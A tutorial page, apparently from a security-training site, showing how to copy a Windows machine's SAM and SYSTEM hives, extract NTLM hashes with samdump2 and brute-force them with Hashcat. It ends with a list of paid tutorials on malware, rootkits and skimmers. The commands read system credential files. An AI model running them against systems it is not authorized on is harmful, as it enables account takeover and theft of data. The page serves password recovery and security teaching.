Modify Firmware Data
Learn how to modify device firmwares & even write them using a CH341A.
November 23, 2024
Learn how to brute force Windows 10 & 11 passwords using Hashcat.
Hashcat is a powerful password recovery tool that supports a wide range of hashing algorithms. This tutorial will guide you through the steps to brute-force a Windows password using Hashcat.
To brute-force a Windows password, you first need to extract the password hashes from the Windows machine. You can do that using samdump2.
samdump2
:
samdump2
using your package manager. For example, on Debian-based systems:
sudo apt-get install samdump2
fdisk -l
and mount it. For example:
sudo mount /dev/sda2 /mnt/windows
sudo cp /mnt/windows/Windows/System32/config/SYSTEM /mnt
sudo cp /mnt/windows/Windows/System32/config/SAM /mnt
samdump2
to extract the hashes:
samdump2 /mnt/SYSTEM /mnt/SAM > /mnt/hashes.txt
Windows 10 & 11's password hashes are typically in NTLM format. The format in hashes.txt
should look like:
user:rid:nthash:::
Create a file containing only the NTLM hashes (16 bytes) by removing the user information and LM hash. For example, create ntlm_hashes.txt
with lines like:
63289B7E7462C3300A2B2CC7C72D260C
cd /opt/hashcat-<version>
./hashcat -m 1000 -a 3 -o found.txt /path/to/ntlm_hashes.txt ?l?l?l?l?l?l?l?l
-m 1000
: Specifies the NTLM hash type.-a 3
: Selects the mask attack mode.-o found.txt
: Specifies the output file for cracked passwords./path/to/ntlm_hashes.txt
: The input file containing the NTLM hashes.?l?l?l?l?l?l?l?l
: Mask for brute-forcing 8-character passwords using lowercase letters.Hashcat will display the progress, estimated time to completion, and other relevant information in the terminal. You can pause and resume the attack by pressing p
and r
, respectively.
Once the attack is complete, the results will be saved in the specified output file (found.txt
). The file will contain the cracked passwords in the format:
<hash>:<password>
Brute-forcing a Windows password with Hashcat involves extracting password hashes, setting up Hashcat, and running the brute-force attack with the appropriate settings. While brute-forcing can be time-consuming, Hashcat's efficiency and speed can significantly reduce the time required to recover passwords. Always ensure you have proper authorization before attempting to crack passwords.
Upgrade to pwn.guide+ today and access tutorials like:
Learn how to modify device firmwares & even write them using a CH341A.
November 23, 2024
Learn how someone could develop malware.
August 3, 2024
Learn how rootkits work, along with a sample rootkit's code.
August 2, 2024
Learn how the RETBleed attack works with an example PoC.
June 17, 2024
How to exploit git to execute commands remotely when someone clones your repo.
June 16, 2024
How to dump the memory of a machine & get secrets from it.
June 8, 2024
Learn how to build a DIY RFID skimmer using an Arduino and an RFID reader module.
May 31, 2024